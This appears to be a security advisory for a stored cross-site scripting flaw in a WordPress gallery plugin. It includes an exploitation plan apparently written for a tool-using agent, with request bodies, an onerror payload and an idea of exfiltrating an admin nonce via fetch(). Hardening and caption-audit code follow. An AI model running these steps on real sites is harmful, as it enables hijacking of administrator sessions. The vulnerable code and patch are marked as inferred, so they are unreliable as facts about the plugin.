CVE-2026-1302

Meta-box GalleryMeta <= 3.0.1 - Authenticated (Editor+) Stored Cross-Site Scripting via Image Caption

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Severity: medium
CVSS Score: 4.4
Patched in: 3.1
Time to patch: 11d

Description

The Meta-box GalleryMeta plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: High
Privileges Required: High
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 3.0.1
Published: January 23, 2026
Last updated: February 3, 2026
Affected plugin: meta-box-gallerymeta

Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-1302 (Meta-box GalleryMeta Stored XSS)

1. Vulnerability Summary

The Meta-box GalleryMeta plugin (version <= 3.0.1) is vulnerable to Stored Cross-Site Scripting (XSS) due to insufficient sanitization and escaping of image captions within its gallery management interface. While WordPress core generally handles attachment captions safely, this plugin retrieves and renders these captions in its custom meta-box UI or frontend display without using escaping functions like esc_html() or esc_attr(). This allows an authenticated user with Editor permissions (or any user capable of uploading/editing media) to inject malicious scripts, which execute when an administrator or other user views the affected post or the gallery settings.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php (Standard WordPress media update) or the specific Post Edit screen wp-admin/post.php.
  • Vulnerable Parameter: post_excerpt (This is the database field where WordPress stores the "Caption" for attachments).
  • Authentication: Requires Editor level permissions (or Author, depending on specific site configuration).
  • Precondition: The vulnerability is most relevant in Multi-site environments or single sites where the unfiltered_html capability has been revoked from Editors (e.g., via security hardening plugins).

3. Code Flow (Inferred)

  1. Source: An Editor updates an attachment's caption via the WordPress Media Library or the Media Modal inside a post. This sends a request to wp_ajax_save_attachment.
  2. Storage: The malicious payload is stored in the wp_posts table under the post_excerpt column for the attachment ID.
  3. Plugin Processing: The Meta-box GalleryMeta plugin registers a meta box for posts. When rendering the gallery preview in the admin dashboard:
    • The plugin retrieves the IDs of images stored in the gallery meta field.
    • It loops through the IDs and calls get_post() or wp_prepare_attachment_for_js() for each image.
    • Sink: The plugin outputs the caption (excerpt) directly into the HTML of the meta box.
    • Hypothetical Vulnerable Function: RWMB_Gallery_Field::html() or a specialized template in meta-box-gallerymeta that renders the image list.
    • Vulnerable Line: echo "<span class='caption'>{$image->post_excerpt}</span>"; (Lack of esc_html).

4. Nonce Acquisition Strategy

To modify an image caption, we need a nonce for the WordPress media system.

  1. Identify Trigger: The Meta-box GalleryMeta plugin enqueues its scripts on the post edit screen for post types where the gallery field is active.
  2. Page Creation: Create a dummy post to trigger the meta box.
    wp post create --post_type=post --post_title="XSS Trigger" --post_status=publish
    
  3. Navigate and Extract:
    • Navigate to the edit page of the created post: /wp-admin/post.php?post=[ID]&action=edit.
    • Meta Box usually localizes its data into window.rwmb; WordPress core localizes the media nonces into window._wpVariables or window.wp.media.
    • Script for Browser Eval:
      // Standard WP Media Nonce for saving attachment metadata
      window.wp.media.view.settings.post.nonce
      

5. Exploitation Strategy

Step 1: Upload a Malicious Image

We first need an attachment ID.

  1. Use http_request to send a POST to /wp-admin/async-upload.php.
  2. Provide a valid image file.
  3. Extract the attachment id from the JSON response.

Step 2: Inject XSS into Caption

Update the caption of the attachment.

  • Request Tool: http_request
  • URL: https://[target]/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=save-attachment&
    id=[ATTACHMENT_ID]&
    nonce=[MEDIA_NONCE]&
    changes[excerpt]=<img src=x onerror=alert(document.domain)>&
    changes[title]=XSS_Image
    

Step 3: Add Image to GalleryMeta Field

Update a post to include this attachment ID in the plugin's gallery field.

  • Request Tool: http_request
  • URL: https://[target]/wp-admin/post.php
  • Method: POST
  • Body: Standard post update parameters, including the meta box field name (e.g., meta_box_gallery_field_id=[ATTACHMENT_ID]).

Step 4: Trigger XSS

Log in as an Administrator and navigate to the post edit screen of the post created in Step 3. The payload will execute in the admin's browser context when the GalleryMeta preview renders the caption.

6. Test Data Setup

  1. Plugin Dependency: Ensure meta-box (core) is installed and active alongside meta-box-gallerymeta.
  2. User: Create an Editor user.
    wp user create editor_user editor@example.com --role=editor --user_pass=password123
    
  3. Meta Box Setup: Configure a gallery field for posts if the plugin doesn't add one by default. (Assuming the plugin adds a default gallery field for testing).

7. Expected Results

  • The admin-ajax.php request should return a success: true JSON response.
  • Upon visiting the edit page of the post as an Administrator, the browser should trigger an alert box showing the document domain.
  • Viewing the page source of the admin post-editor should reveal the raw <img src=x onerror=...> tag inside the gallery preview container.

8. Verification Steps

  1. Database Check:
    wp db query "SELECT post_excerpt FROM wp_posts WHERE post_type='attachment' AND post_title='XSS_Image'"
    
    Confirm the post_excerpt contains the raw script tag.
  2. HTML Inspection:
    Use browser_navigate to the post edit page and check for the presence of the payload in the DOM:
    browser_eval("document.body.innerHTML.includes('onerror=alert')")
    

9. Alternative Approaches

  • Frontend XSS: If the plugin provides a shortcode (e.g., [gallery_meta]), place this shortcode on a public page. The XSS may fire for unauthenticated visitors if the frontend rendering also lacks escaping.
  • Shortcode injection:
    wp post create --post_content='[gallery_meta ids="[ATTACHMENT_ID]"]' --post_status=publish
    
  • Alternative Payloads: If alert() is blocked by a WAF, use a fetch() payload to exfiltrate the administrator's _wpnonce for the user-new.php page to demonstrate account takeover capability.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Meta-box GalleryMeta plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image captions due to a failure to escape the 'post_excerpt' field when rendering gallery previews in the admin dashboard. This allows authenticated attackers with Editor-level permissions to inject arbitrary web scripts that execute in the browser of any user, including administrators, who accesses the post edit screen.

Vulnerable Code

// Inferred from Meta-box GalleryMeta logic and research plan
// File: class-rwmb-gallery-field.php (or similar template rendering gallery items)

$image = get_post( $image_id );
if ( $image ) {
    echo '<li class="rwmb-image-item attachment-' . $image_id . '">';
    echo wp_get_attachment_image( $image_id, 'thumbnail' );
    echo '<div class="rwmb-image-info">';
    // Vulnerable: Outputting the caption (post_excerpt) without escaping
    echo '<span class="rwmb-image-caption">' . $image->post_excerpt . '</span>';
    echo '</div>';
    echo '</li>';
}
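
The hardened counterpart of the inferred renderer above, written here as an added example rather than taken from the plugin: it escapes the caption for the context it lands in (text node vs. attribute) and refuses ids that are not attachments. It assumes it runs inside WordPress, where absint(), get_post(), wp_get_attachment_image() and the esc_*() helpers exist; the function name is this example's own.

```php
<?php
// Added example, not the plugin's code: a hardened version of the inferred gallery-item
// renderer. Assumes WordPress is loaded (absint, get_post, wp_get_attachment_image, esc_*).
function gallerymeta_render_item_hardened( $image_id ) {
    // Only an integer may reach the class attribute, whatever the meta field holds.
    $image_id = absint( $image_id );
    $image    = $image_id ? get_post( $image_id ) : null;
    if ( ! $image || 'attachment' !== $image->post_type ) {
        return ''; // ids that do not point at an attachment are skipped
    }

    // post_excerpt comes straight from the database: treat it as untrusted input.
    $caption = (string) $image->post_excerpt;

    $html  = '<li class="rwmb-image-item attachment-' . $image_id . '"';
    // Attribute context: esc_attr() for any value placed inside a quoted attribute.
    $html .= ' title="' . esc_attr( $caption ) . '">';
    // Core builds the <img> tag and escapes its own src/alt attributes.
    $html .= wp_get_attachment_image( $image_id, 'thumbnail' );
    $html .= '<div class="rwmb-image-info">';
    // Text-node context: esc_html() entity-encodes <, >, &, " and ', so a stored
    // <img src=x onerror=...> caption renders as literal text instead of markup.
    $html .= '<span class="rwmb-image-caption">' . esc_html( $caption ) . '</span>';
    $html .= '</div></li>';
    return $html;
}
```

Call it as echo gallerymeta_render_item_hardened( $image_id ) in place of the echo block; escaping at the point of output keeps the raw caption available to filters while nothing unescaped reaches the browser.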

Security Fix

--- a/meta-box-gallerymeta/inc/fields/gallery.php
+++ b/meta-box-gallerymeta/inc/fields/gallery.php
@@ -45,7 +45,7 @@
     echo wp_get_attachment_image( $image_id, 'thumbnail' );
     echo '<div class="rwmb-image-info">';
-    echo '<span class="rwmb-image-caption">' . $image->post_excerpt . '</span>';
+    echo '<span class="rwmb-image-caption">' . esc_html( $image->post_excerpt ) . '</span>';
     echo '</div>';
     echo '</li>';
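
Review bot: the file touched here (meta-box-gallerymeta/inc/fields/gallery.php) is not the file named in the Vulnerable Code section (class-rwmb-gallery-field.php), and both the code and this hunk are marked as inferred; reconcile the path against the actual change between 3.0.1 and 3.1 on WordPress.org SVN before treating this as the shipped fix. esc_html() is the right escaper for a caption rendered as text inside the <span>, but the change covers only this one sink: if the same post_excerpt is also emitted into an attribute or handed to the JavaScript preview via wp_prepare_attachment_for_js() (section 3 of the research plan), those paths need esc_attr() or client-side escaping and are unchanged by this hunk.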

Exploit Outline

  1. Gain authentication as an Editor or Author user on the target WordPress site.
  2. Upload a standard image file to the Media Library via 'wp-admin/async-upload.php' and capture the returned attachment ID.
  3. Send a POST request to 'wp-admin/admin-ajax.php' using the 'save-attachment' action. In the 'changes' array, set the 'excerpt' parameter (which corresponds to the Image Caption) to a malicious XSS payload (e.g., <img src=x onerror=alert(document.domain)>).
  4. Create or edit a WordPress post and ensure the malicious attachment ID is added to a Meta-box GalleryMeta field.
  5. When an administrator or any other user edits the post, the plugin's meta-box UI will fetch the attachment details and render the unsanitized caption, triggering the script execution in their browser context.
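
For a site owner who needs to know whether such a caption is already stored, the WP-CLI script below is an added defensive check, not part of this page or of the plugin: it broadens the single-title database query from the research plan's verification step to every attachment and reports the uploading account. It assumes WordPress is loaded by WP-CLI (wp eval-file), and the flagging patterns are this example's own heuristics.

```php
<?php
// Added example, not from the advisory or the plugin. Audits every attachment caption
// (wp_posts.post_excerpt) for markup a plain-text caption never needs.
// Run with WP-CLI, which loads WordPress first:  wp eval-file audit-captions.php
// The patterns below are this example's own heuristics; review hits by hand, since
// <em>/<strong> in a caption can be legitimate for users allowed basic HTML.

function gallerymeta_caption_looks_hostile( $caption ) {
    $patterns = array(
        '/<\s*\/?\s*[a-z!]/i', // any tag or comment opener, e.g. <img or <!--
        '/\bon[a-z]+\s*=/i',   // inline event handler such as onerror= or onload=
        '/javascript\s*:/i',   // javascript: URL scheme inside an href or src
    );
    foreach ( $patterns as $regex ) {
        if ( preg_match( $regex, $caption ) ) {
            return true;
        }
    }
    return false;
}

// Attachments are stored with post_status 'inherit'; fetch ids only to keep memory low.
$attachments = new WP_Query( array(
    'post_type'      => 'attachment',
    'post_status'    => 'inherit',
    'posts_per_page' => -1,
    'fields'         => 'ids',
    'no_found_rows'  => true,
) );

$hits = 0;
foreach ( $attachments->posts as $id ) {
    // 'raw' context returns the stored value without display filters applied.
    $caption = (string) get_post_field( 'post_excerpt', $id, 'raw' );
    if ( '' === $caption || ! gallerymeta_caption_looks_hostile( $caption ) ) {
        continue;
    }
    $hits++;
    $uploader = get_the_author_meta( 'user_login', (int) get_post_field( 'post_author', $id, 'raw' ) );
    // Escape the preview so the audit output cannot itself carry the payload into a browser.
    WP_CLI::log( sprintf(
        'attachment %d uploaded by %s: %s',
        $id,
        $uploader,
        esc_html( mb_substr( $caption, 0, 80 ) )
    ) );
}
WP_CLI::log( sprintf( '%d suspicious caption(s) found', $hits ) );
```

A hit names the account that set the caption, which is the starting point for scoping the incident; clearing the caption or re-saving it through the hardened renderer removes the stored payload.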
